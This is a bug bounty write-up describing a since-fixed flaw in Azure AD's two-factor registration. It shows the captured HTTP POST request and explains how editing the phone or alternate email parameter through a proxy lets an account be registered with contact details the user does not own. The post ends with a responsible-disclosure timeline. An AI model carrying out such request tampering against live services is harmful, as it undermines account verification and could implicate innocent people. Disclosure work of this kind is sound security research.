loading...

Ocak 24, 2018

EN | Microsoft Authentication Bypass

Greetings,

Summary

Vulnerability allows you to confirm a phone number or mail that you own or not. So you can bypas the two factor authentication verification.  You can add the phone number or e-mail address to the corporate e-mail address without knowing it. This is very big problem in terms of digital forensics and security. When attackers commit a crime with an account that is not yours, it can cause problems because the phone number belongs to you. Moreover, since the phone number is approved, you can fall into the criminal position. Imagine having your phone number verified on an account that sends a phishing email.

P.S. Two-step verification must be active so leak can occur. At the same time, the 2FA verification must be required by the administrator.

Authentication(2FA) Bypass

Step1:

The administrator must approve a two factor authentication and request you to add the phone number from your account when logging in.

Step2:

I chose to verify with mobile and continued.

Step 3:

Let us examine the outgoing request when we press the verification button;

POST /passwordreset/SendEmail.ajax HTTP/1.1
Host: account.activedirectory.windowsazure.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
X-Requested-With: XMLHttpRequest
AjaxSessionKey: null
__RequestVerificationToken: xkbu4lBzTLi4syPavllsrfnvFxXgEWQIGC1sadasdaxxHuzbcu01
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: https://account.activedirectory.windowsazure.com/passwordreset/register.aspx?client-request-id=x&sspr=1
Content-Length: 455
Cookie: flt=0; BOX.SessionCacheKey.SessID=cac246d0-xxxx-4bb5-879c-9xxxxe5ba1; BOX.SessionCacheKey.sspr-reg-ru=https://login.microsoftonline.com/common/SAS/ProcessAuth?request=rxxxxG5dO028RI59EjuJL3VO43C; BOX.CacheKey.CachedCSSFiles=1.0.0.1960:0xxxxxxFEDxx40xDB475A4C0x9B3Fxxxx2487
DNT: 1
Connection: close

p0=%7B%22UserCompanyName%22%3A%22Lostar%22%2C%22MobileCountryCode%22%3A%2290%22%2C%22MobileCountryCodeIndex%22%3A213%2C%22MobilePhoneNumber%22%3A%22x%22%2C%22AltEmail%22%3A%22berk.imran7%40gmail.com%22%2C%22RegistrationAttribute%22%3A%22AlternateEmailAttribute%22%2C%22MobilePhoneValidationOptionKey%22%3A%22%22%7D&assembly=BOX.AzurePortalWebsite, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null&class=Microsoft.Online.BOX.Admin.UI.Register

When I examine the outgoing post request and when I perform URL decode;

p0={"UserCompanyName":"Lostar","MobileCountryCode":"90","MobileCountryCodeIndex":213,"MobilePhoneNumber":"{Phone number}","AltEmail":"[email protected]","RegistrationAttribute":"AlternateEmailAttribute","MobilePhoneValidationOptionKey":""}&assembly=BOX.AzurePortalWebsite, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null&class=Microsoft.Online.BOX.Admin.UI.Register

All you need to do is change the phone number or mail address with proxy. Namely;

p0={"UserCompanyName":"Lostar","MobileCountryCode":"90","MobileCountryCodeIndex":213,"MobilePhoneNumber":"{Phone number}","AltEmail":"[email protected]","RegistrationAttribute":"AlternateEmailAttribute","MobilePhoneValidationOptionKey":""}&assembly=BOX.AzurePortalWebsite, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null&class=Microsoft.Online.BOX.Admin.UI.Register

Step4:

Got e-mail.

Proof of Concept

Timeline

October 10: Report Submitted
October 16: Report reviewed
October 18 – 21: Discussion
November 17: Report closed as resolved
Final: Award and hall of fame.

Posted in Bug Bounty, Web Güvenliği, Write-UpTaggs:
Write a comment